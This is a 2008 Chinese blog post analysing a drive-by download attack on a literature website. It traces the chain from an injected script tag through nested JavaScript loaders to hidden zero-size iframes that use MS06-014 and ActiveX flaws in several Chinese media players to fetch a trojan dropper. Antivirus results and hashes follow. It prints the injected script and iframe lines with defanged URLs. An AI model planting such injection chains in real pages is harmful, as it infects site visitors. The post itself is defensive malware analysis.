某文学网站挂马logo.jpg/logo.exe

本文详细分析了一个文学网站遭受恶意攻击的过程。攻击者通过多级链接最终利用多种浏览器及播放器漏洞下载恶意文件logo.jpg。文章还展示了不同反病毒软件对该恶意文件的检测结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

某文学网站挂马logo.jpg/logo.exe

endurer 原创
2008-04-30 第1

该网站网页包含代码:
/---
<script src="hxxp://www.ol***d*rain.com/ads/iw_t.js"></scipt>
---/

#1 hxxp://www.ol***d*rain.com/ads/iw_t.js 包含代码:
/---
<script src='/images/jin.gif'></script>
---/

#1.1 hxxp://www.ol***d*rain.com/images/jin.gif包含JavaScript代码,其功能为检查cookie变量my_ad,输出代码:
/---
<script language="javascript" src="hxxp://ww**.shi**t*ip.com/file/my.js"></script>
---/


#1.1.1 hxxp://ww**.shi**t*ip.com/file/my.js 输出代码:
/---
<script language='javascript' src='hxxp://ad.shi**t*ip.com/file/ad.js'></script>
---/

#1.1.1.1 hxxp://ad.shi**t*ip.com/file/ad.js 输出代码:
/---
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/logo.htm'></iframe>
<iframe width='25' height='0' src='hxxp://ww**.shi**t*ip.com/file/xunlei.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/real.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/lz.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/bf.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/pps.htm'></iframe>
<iframe width='0' height='0' src='hxxp://ww**.shi**t*ip.com/file/sdr.htm'></iframe>
<iframe name='mycountif' width='0' height='0'></iframe>
---/

#1.1.1.1.1 hxxp://ww**.shi**t*ip.com/file/logo.htm

利用 MS06-014漏洞下载 hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

文件说明符 : D:/test/logo.jpg
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-30 12:31:44
修改时间 : 2008-4-30 12:31:44
大小 : 30788 字节 30.68 KB
MD5 : 497cd95b261c35e380c33065058cc7ac
SHA1: 1B4A5CD93D8C4F347DEAA8BA55F6A50DE0BA4FAE
CRC32: 3e7aaf5e

文件 497cd95b261c35e380c33065058cc7ac- 接收于 2008.04.30 07:38:54 (CET)

反病毒引擎版本最后更新扫描结果
AhnLab-V32008.4.30.02008.04.29-
AntiVir7.8.0.102008.04.29TR/Dropper.Gen
Authentium4.93.82008.04.27-
Avast4.8.1169.02008.04.29-
AVG7.5.0.5162008.04.30Clicker.NBD
BitDefender7.22008.04.30-
CAT-QuickHeal9.502008.04.29(Suspicious) - DNAScan
ClamAV0.92.12008.04.30PUA.Packed.UPack-2
DrWeb4.44.0.091702008.04.29-
eSafe7.0.15.02008.04.28-
eTrust-Vet31.3.57462008.04.30-
Ewido4.02008.04.29-
F-Prot4.4.2.542008.04.30-
F-Secure6.70.13260.02008.04.30-
Fortinet3.14.0.02008.04.29-
IkarusT3.1.1.262008.04.30Trojan-Dropper
Kaspersky7.0.0.1252008.04.30-
McAfee52842008.04.29New Malware.aj
MicrosoftNone2008.04.22-
NOD32v230642008.04.29Win32/TrojanClicker.Agent.NCS
Norman5.80.022008.04.29-
Panda9.0.0.42008.04.30Suspicious file
Prevx1V22008.04.30-
Sophos4.28.02008.04.30Mal/Packer
Sunbelt3.0.1056.02008.04.17VIPRE.Suspicious
Symantec102008.04.30-
TheHacker6.2.92.2972008.04.29W32/Behav-Heuristic-060
VBA323.12.6.52008.04.29-
VirusBuster4.3.26:92008.04.29Packed/Upack
Webwasher-Gateway6.6.22008.04.30Trojan.Dropper.Gen
附加信息
File size: 30499 bytes
MD5...: f72b708b004a1ccfde0b3e10bced6cda
SHA1..: 439bac0bf2b84d09be5abce588b65bbb3cac55e9
SHA256: 60c6c4caa211c6fec6b011ba7d1574ce139854cb0fee5ca3591f3379f06e09c1
SHA512: a050cf1e7e7874a6f3df0b974964e7d5d2137c38423c872f739c77665433faac<BR>5ba51cc952a860642d241115ff8a314d09e3c9659ab9d7c694464c4323a32d0a
PEiD..: -
PEInfo: -
packers: UPack
packers: PE_Patch, UPack


#1.1.1.1.2 hxxp://ww**.shi**t*ip.com/file/xunlei.htm

利用迅雷(PPlayer.XPPlayer.1,clsid:F3E70CEA-956E-49CC-B444-73AFE593AD7F)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.3 hxxp://ww**.shi**t*ip.com/file/real.htm

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.4 hxxp://ww**.shi**t*ip.com/file/lz.htm

利用联众(GLCHAT.GLChatCtrl.1,clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

#1.1.1.1.5 hxxp://ww**.shi**t*ip.com/file/bf.htm

利用暴风暴音(MPS.StormPlayer,clsid:6BE52E1D-E586-474f-A6E2-1A85A9B4D9FB)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg


#1.1.1.1.6 hxxp://ww**.shi**t*ip.com/file/pps.htm

利用PPStream(POWERPLAYER.PowerPlayerCtrl.1,clsid:5EC7C511-CD0F-42E6-830C-1BD9882F3458)漏洞下载 hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

hxxp://ww**.shi**t*ip.com/file/sdr.htm

利用超星阅览器(clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2)漏洞下载hxxp://ww**.shi**t*ip.com/file/images/logo.jpg

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值